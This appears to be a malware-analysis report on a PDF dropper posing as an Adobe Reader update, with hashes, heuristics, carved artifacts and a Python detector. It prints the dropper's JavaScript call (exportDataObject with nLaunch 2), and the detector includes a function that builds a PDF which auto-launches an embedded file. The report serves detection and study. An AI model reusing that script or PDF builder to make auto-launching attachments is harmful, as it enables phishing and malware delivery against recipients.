Malicious PDF — malware analysis report

Static analysis result for SHA-256 be2991b9dc4e34bf…

Verdict: MALICIOUS
File type: PDF
File size: 600.1 KB
Authoring application: PyPDF2
First seen: 2026-06-05
MD5: 656b9147de9db6a7ed2651148c7e8ace
SHA-1: 31481fbceda169970161e0f0f3dda83ac41a2d66
SHA-256: be2991b9dc4e34bf8f4e96fd20239132ecbcd998c446500537c78cbf1aa8661b
Risk score: 260

Malware Insights

MITRE ATT&CK
  • T1059.007 Command and Scripting Interpreter: JavaScript
  • T1566.001 Phishing: Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The PDF's open action runs JavaScript that, after a 2-second app.setTimeOut, calls exportDataObject with cName 'adobe_update.html' and nLaunch: 2, which saves the embedded HTML file to a temporary path and opens it in the default handler without prompting the user. That HTML file, not the PDF container, is what the ClamAV signature (Win.Packed.Generickdz-9879553-0) fires on: it is 524,851 bytes, roughly half of its identifiers are name-mangled, and it carries a long base64-like blob, so it is likely a lure page styled as an Adobe Reader update that decodes or fetches a further payload rather than a purely visual decoy. The ClamAV detection and the ML classifier score corroborate the static verdict.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9793

Heuristics (9)

  • ClamAV: Win.Packed.Generickdz-9879553-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Packed.Generickdz-9879553-0
  • JavaScript action [low, 2 related findings] PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • exportDataObject + nLaunch: embedded-file launch-on-open dropper [critical] PDF_JS_EXPORT_LAUNCH_DROPPER
    PDF JavaScript calls exportDataObject() with nLaunch set. With nLaunch: 2 Acrobat saves the document's embedded file to a temporary path without prompting and opens it in its default application. This is a launch-on-open dropper: the embedded file is the payload. No benign workflow auto-launches an extracted PDF attachment.
  • Embedded JS stream [low] PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded script payload in PDF stream [medium] PDF_EMBEDDED_SCRIPT_PAYLOAD
    PDF stream bytes contain an HTML/XFA <script> tag without accompanying Windows shell-execution primitives. This is common in accessible XFA forms but worth surfacing for analyst review.
  • Embedded file [low] PDF_EMBEDDED
    PDF embeds a file attachment, which could carry an executable or another weaponised document as a nested payload.
  • External URI [info] PDF_URI
    PDF contains an external URL action.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • https://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js (referenced by PDF JavaScript)
    • http://aa.ogepscmaa/isjur/../qeymnj (referenced by PDF JavaScript)
    • https://get.adobe.com/uk/reader/ (referenced by PDF JavaScript)
    • https://get.adobe.com/reader/modal/?content=readerSystemRequirement&loc=uk&version=2021%2E005%2E20058&os=Windows&fakeajax (PDF link annotation)
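The PDF_JS_EXPORT_LAUNCH_DROPPER logic above can be reproduced with a small stand-alone carver. The Python below is an added example written for this page, not the analysis engine's own code: it builds a constructed PDF that mirrors the reported layout (OpenAction JavaScript in object 4, a FlateDecode EmbeddedFile in object 7, the same setTimeOut/exportDataObject script), carves the objects, decodes the /JS literal string with its nested parentheses, flags exportDataObject() with nLaunch set, carves and hashes the embedded file, and cross-checks cName against the /Filespec names so that a launch of an attachment that does not exist is not scored as a dropper. The placeholder HTML, the absence of an xref table, and the "medium" rating for exportDataObject without nLaunch are assumptions.

```python
"""Static triage for the launch-on-open dropper reported above: PDF JavaScript
calling exportDataObject() with nLaunch set, so an embedded file is written to
disk and opened.  Added example, not the analysis engine's code.  The PDF is
constructed inline to mirror the reported layout (JS in object 4, EmbeddedFile
in object 7); its HTML is a placeholder, not the 524,851-byte artifact."""
import hashlib
import re
import zlib

OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj\b(.*?)endobj", re.DOTALL)
EXPORT_RE = re.compile(r"exportDataObject\s*\(\s*\{([^}]*)\}")
SAMPLE_HTML = b"<html><script>/* constructed placeholder lure */</script></html>"
SAMPLE_JS = (b"var t = app.setTimeOut(\"this.exportDataObject({ cName: "
             b"'adobe_update.html', nLaunch: 2 });\",2000);")  # as extracted above


def build_sample_pdf():
    """Minimal PDF without an xref table; the carver walks 'N G obj ... endobj'."""
    packed = zlib.compress(SAMPLE_HTML)
    objs = [
        (1, b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R "
            b"/Names << /EmbeddedFiles << /Names [(adobe_update.html) 6 0 R] >> >> >>"),
        (2, b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>"),
        (3, b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>"),
        (4, b"<< /S /JavaScript /JS (" + SAMPLE_JS + b") >>"),
        (6, b"<< /Type /Filespec /F (adobe_update.html) /EF << /F 7 0 R >> >>"),
        (7, b"<< /Type /EmbeddedFile /Filter /FlateDecode /Length %d >>\nstream\n"
            % len(packed) + packed + b"\nendstream"),
    ]
    body = b"".join(b"%d 0 obj\n%s\nendobj\n" % (n, o) for n, o in objs)
    return b"%PDF-1.7\n" + body + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


def parse_objects(pdf):
    """Map object number -> (dictionary bytes, decoded stream bytes or None).
    A direct /Length is trusted; an indirect /Length falls back to the
    endstream keyword.  Only FlateDecode is handled."""
    objects = {}
    for num, body in OBJ_RE.findall(pdf):
        m = re.search(rb"stream\r?\n", body)
        if not m:
            objects[int(num)] = (body, None)
            continue
        head, data = body[: m.start()], body[m.end():]
        ln = re.search(rb"/Length\s+(\d+)(?!\s+\d+\s+R)", head)
        stream = data[: int(ln.group(1))] if ln else data.rsplit(b"endstream", 1)[0].rstrip(b"\r\n")
        if b"/FlateDecode" in head:
            try:
                stream = zlib.decompress(stream)
            except zlib.error:
                pass  # keep raw bytes; a broken filter is itself worth a look
        objects[int(num)] = (head, stream)
    return objects


def literal_string(text, start):
    """PDF literal string whose '(' is at text[start], with balanced nesting;
    a backslash escape is reduced to the escaped character (no octal handling)."""
    depth, i, out = 0, start, []
    while i < len(text):
        c = text[i : i + 1]
        if c == b"\\":
            out.append(text[i + 1 : i + 2])
            i += 2
            continue
        depth += (c == b"(") - (c == b")")
        if depth == 0:
            break
        if not (c == b"(" and depth == 1):
            out.append(c)
        i += 1
    return b"".join(out)


def collect_javascript(objects):
    """[(object number, script bytes)] for /JS given as a literal or a stream ref."""
    scripts = []
    for num, (head, _s) in objects.items():
        m = re.search(rb"/JS\s*(\(|(\d+)\s+\d+\s+R)", head)
        if m and m.group(1) == b"(":
            scripts.append((num, literal_string(head, m.start(1))))
        elif m and objects.get(int(m.group(2)), (None, None))[1] is not None:
            scripts.append((num, objects[int(m.group(2))][1]))
    return scripts


def score_script(js, filespec_names):
    """exportDataObject() with nLaunch 1 or 2 (per the Acrobat JS API reference,
    2 = save to a temp path and open, no prompt).  Matching runs over the whole
    text, so a call tucked inside the string argument of app.setTimeOut(), as
    in this sample, is still caught."""
    text = js.decode("latin-1")
    delayed = re.search(r"app\.set(TimeOut|Interval)\s*\(", text) is not None
    findings = []
    for m in EXPORT_RE.finditer(text):
        n = re.search(r"nLaunch\s*:\s*(\d)", m.group(1))
        name = re.search(r"cName\s*:\s*['\"]([^'\"]+)['\"]", m.group(1))
        launch = int(n.group(1)) if n else 0
        findings.append({
            "rule": "PDF_JS_EXPORT_LAUNCH_DROPPER" if launch else "exportDataObject (no launch)",
            "severity": "critical" if launch else "medium",  # medium is an assumed rating
            "cName": name.group(1) if name else None,
            "nLaunch": launch,
            "delayed": delayed,
            "embedded_present": bool(name) and name.group(1) in filespec_names,
        })
    return findings


def triage(pdf):
    """Carve embedded files, collect scripts, cross-check cName against /Filespec."""
    objects = parse_objects(pdf)
    names = set()
    for head, _s in objects.values():
        m = re.search(rb"/Filespec.*?/F\s*(\()", head, re.DOTALL)
        if m:
            names.add(literal_string(head, m.start(1)).decode("latin-1"))
    embedded = [{"object": n, "size": len(s), "sha256": hashlib.sha256(s).hexdigest()}
                for n, (h, s) in objects.items() if b"/EmbeddedFile" in h and s is not None]
    scripts = collect_javascript(objects)
    findings = [f for _n, js in scripts for f in score_script(js, names)]
    launched = any(f["nLaunch"] and f["embedded_present"] for f in findings)
    return {"scripts": len(scripts), "embedded": embedded, "findings": findings,
            "verdict": "critical" if launched else "suspicious" if findings else "clean"}
```

Running triage(build_sample_pdf()) yields verdict "critical" with one finding (cName 'adobe_update.html', nLaunch 2, delayed via app.setTimeOut, attachment present) and one carved EmbeddedFile with its SHA-256. Matching the call anywhere in the script text matters: the real call is the string argument of app.setTimeOut and would be invisible to a tokenizer that only inspects direct calls. Real samples also use hex strings, other stream filters and indirect /Length values; this carver handles only literal strings and FlateDecode, which is enough for the pattern reported here.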

Extracted artifacts (7)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size

adobe_update.html | pdf-embedded-file | PDF EmbeddedFile object 7 at offset 0x493 | 524851 bytes
  SHA-256: 1b6e48bee49fc065a56abaff9c76b61251eddcd6782574c7aaa8cc1d2482d8bc
  Detection: ClamAV: Win.Packed.Generickdz-9879553-0
  Obfuscation or payload: likely
    4946 of 10433 identifiers look randomly generated (e.g. 'dj56Pn48ZgGSAvIKwhECGCIcoioiTcJfUlyGDeYX'); 35 string-concatenation chain(s), consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).

javascript_obj0004_000.js | pdf-javascript-stream | PDF /JS object 4 at offset 0x27D | 106 bytes
  SHA-256: d692f7662d545726b3153195252dcc81ba2e30e33a95a9662637802a7e9e8712
  Detection: ClamAV: No threats found
  Obfuscation or payload: likely
    Carved artifact contains 1 eval/decoder/string-building token(s) (the string argument passed to app.setTimeOut is evaluated as code).
  Preview script (first 1,000 lines of the extracted script):
    var t = app.setTimeOut("this.exportDataObject({ cName: 'adobe_update.html', nLaunch: 2 });",2000);

javascript_obj0004_001.js | pdf-javascript-stream | PDF /JS object 4 at offset 0x27D | 92 bytes
  SHA-256: 8daf2ab33e463fb46dbe0e000ffb0a9d7c0911b790cf1f20b31981e3f36b2207
  Detection: ClamAV: No threats found
  Obfuscation or payload: likely
    Carved artifact contains 1 eval/decoder/string-building token(s).
  Preview script (first 1,000 lines of the extracted script; this 92-byte copy ends mid-call exactly as carved):
    var t = app.setTimeOut("this.exportDataObject({ cName: 'adobe_update.html', nLaunch: 2 }

combined_document_js_000.js | deobfuscated-js | combined document JavaScript streams at offset 0x27D | 199 bytes
  SHA-256: 8b7f22b425408a6f5affcb45dda2e7a0c35b98f2e76a96af44b6e01130380220
  Detection: ClamAV: No threats found
  Obfuscation or payload: likely
    Carved artifact contains 2 eval/decoder/string-building token(s).
  Preview script (first 1,000 lines of the extracted script; the two /JS streams above concatenated):
    var t = app.setTimeOut("this.exportDataObject({ cName: 'adobe_update.html', nLaunch: 2 });",2000);

    var t = app.setTimeOut("this.exportDataObject({ cName: 'adobe_update.html', nLaunch: 2 }

font_00_sfnt_off00082020.bin | pdf-font-stream | PDF embedded font (sfnt) at offset 0x82020 | 49460 bytes
  SHA-256: b3d663073f10dc69ed2ade8e0ddeee3b7e20a30127907ae0d6db821003f3e4e9

font_01_sfnt_off00089b68.bin | pdf-font-stream | PDF embedded font (sfnt) at offset 0x89B68 | 20776 bytes
  SHA-256: 155af8f01291e607f59df6e62c2c08cb4989cd882a2df56db771222d91f14aa9

font_02_sfnt_off0008ce02.bin | pdf-font-stream | PDF embedded font (sfnt) at offset 0x8CE02 | 38572 bytes
  SHA-256: 9e4e3f12965c0d41143ab78585170c3f3cdad1b5b8f7bdd79d0c75611b1d695e